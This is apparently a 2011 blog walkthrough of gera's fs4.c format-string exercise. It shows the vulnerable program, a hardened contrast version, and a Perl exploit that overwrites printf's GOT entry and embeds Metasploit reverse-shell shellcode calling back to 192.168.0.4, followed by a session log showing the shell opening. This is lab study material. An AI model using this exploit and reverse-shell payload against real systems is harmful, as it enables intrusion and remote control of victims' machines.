Monday, November 14, 2011

Format Strings: fs4

gera's Insecure Programming fs4.c

/* fs4.c                                                    *
 * specially crafted to feed your brain by gera@core-sdi.com */

/* Have you ever heard about code reusability? */

#include <stdio.h>   /* added here so the file builds cleanly; not in gera's original */

int main(int argv,char **argc) {
	char buf[256];
	/* copies argc[1] into buf, then %6$hn writes the output count (as a short)
	 * through snprintf's sixth argument, which is read from main's frame */
	snprintf(buf,sizeof buf,"%s%6$hn",argc[1]);
	printf(buf);   /* user-controlled data used as the format string */
}

Very similar to fs3, except that the format string uses direct parameter access: "%6$hn" writes the number of characters produced so far, as a 16-bit short, to the address found in snprintf's sixth argument. Only one argument is actually passed, so the remaining positions are read from main's stack frame, where buf sits, and buf has just been filled with argc[1] by the "%s". That is the "code reusability" the comment hints at: the caller's own buffer supplies the pointer for the write.
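For contrast, here is the hardened form of the same program, as an added example that is not gera's code: the argument is only ever passed as data for "%s", and a small checker (fmt_is_literal, a name chosen here) shows how a harness can flag inputs such as "%6$hn" that would have acted as conversions.

```c
/* Added example (not gera's code): the fs4 bug beside a hardened form.
 * The real fix is never to let user input act as a format string; the
 * checker below is for harnesses or log filters that must reject such
 * inputs. Function names are ours, not the original's. */
#include <stdio.h>
#include <string.h>

/* Return 1 if s would be safe where a format string is expected, i.e. it
 * contains no conversion specification (every '%' is part of "%%").
 * Anything else, including "%6$hn" from the post, returns 0. */
int fmt_is_literal(const char *s) {
    for (; *s; s++) {
        if (*s != '%')
            continue;
        if (s[1] == '%') {   /* "%%" prints a literal percent sign */
            s++;
            continue;
        }
        return 0;            /* a real conversion: %s, %n, %6$hn, ... */
    }
    return 1;
}

/* Hardened echo: the argument is data for "%s", never the format.
 * Returns the number of bytes stored in out (truncated to n-1). */
size_t echo_arg(const char *arg, char *out, size_t n) {
    int len = snprintf(out, n, "%s", arg);   /* arg is an argument, not a format */
    if (len < 0)
        return 0;
    return (size_t)len < n ? (size_t)len : n - 1;
}

int main(int argc, char **argv) {
    char buf[256];
    if (argc < 2)
        return 1;
    echo_arg(argv[1], buf, sizeof buf);
    /* printf(buf) was the bug; print buf as data instead. GCC's
     * -Wformat -Wformat-security flags the original call at compile time. */
    printf("%s\n", buf);
    return 0;
}
```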

#!/usr/bin/perl

# filler for snprintf arguments 2-5 (four dwords), so that the address lands in argument 6
my $filler = "A" x 16;

# address for the %6$hn to write the number of characters to
# printf()'s GOT address, offset by 2 to point to the most significant bytes
# 0x0804957c -> 0x0804957e
my $addr = "\x7e\x95\x04\x08";

# shellcode
# msf3 linux/x86/shell_reverse_tcp, LHOST=192.168.0.4, badchars="\x00"
my $shellcode =
"\xba\xbb\x01\x12\x0d\xda\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9" .
"\xb1\x12\x83\xc6\x04\x31\x56\x11\x03\x56\x11\xe2\x4e\x30" .
"\xc9\xfa\x53\x60\xae\x57\xf9\x85\xb9\xb9\x4d\xef\x74\xb9" .
"\xf6\xae\xee\x7a\xa0\x4f\xeb\x1c\xd8\x5e\xaf\x86\x4b\x0b" .
"\x5f\x16\x3b\x42\xbe\xdb\xd1\x32\x19\x11\xa5\xe2\x1e\x70" .
"\x15\x2b\xec\x03\x1c\x2d\x17\x53\xf6\xe2\xc8\x27\x6e\x95" .
"\x39\xaa\x07\x0b\xcf\xc9\x87\x80\x46\xec\x97\x2c\x94\x6f";

# nop sled sized so that filler + addr + nops + shellcode totals 49151 bytes (0xbfff);
# snprintf's %6$hn then stores 0xbfff into the upper two bytes of printf's GOT entry
my $nops = "\x90" x (49131-length($shellcode));

print $filler.$addr.$nops.$shellcode;

Since printf(buf) is called right after the snprintf, I'm overwriting the upper half of printf's GOT entry so that the call lands in the nop slide and shellcode.

dennis@ipa:~/fs4$ objdump -R fs4

fs4: file format elf32-i386

DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049588 R_386_GLOB_DAT __gmon_start__
08049570 R_386_JUMP_SLOT __register_frame_info
08049574 R_386_JUMP_SLOT __deregister_frame_info
08049578 R_386_JUMP_SLOT __libc_start_main
0804957c R_386_JUMP_SLOT printf
08049580 R_386_JUMP_SLOT __cxa_finalize
08049584 R_386_JUMP_SLOT snprintf


msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.0.4:4444
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.0.4:4444 -> 192.168.0.38:49209) at 2011-11-14 20:48:16 -0600

id
uid=500(dennis) gid=500(dennis) groups=500(dennis)
pwd
/home/dennis/fs4

[*] Command shell session 1 closed. Reason: Died from EOFError
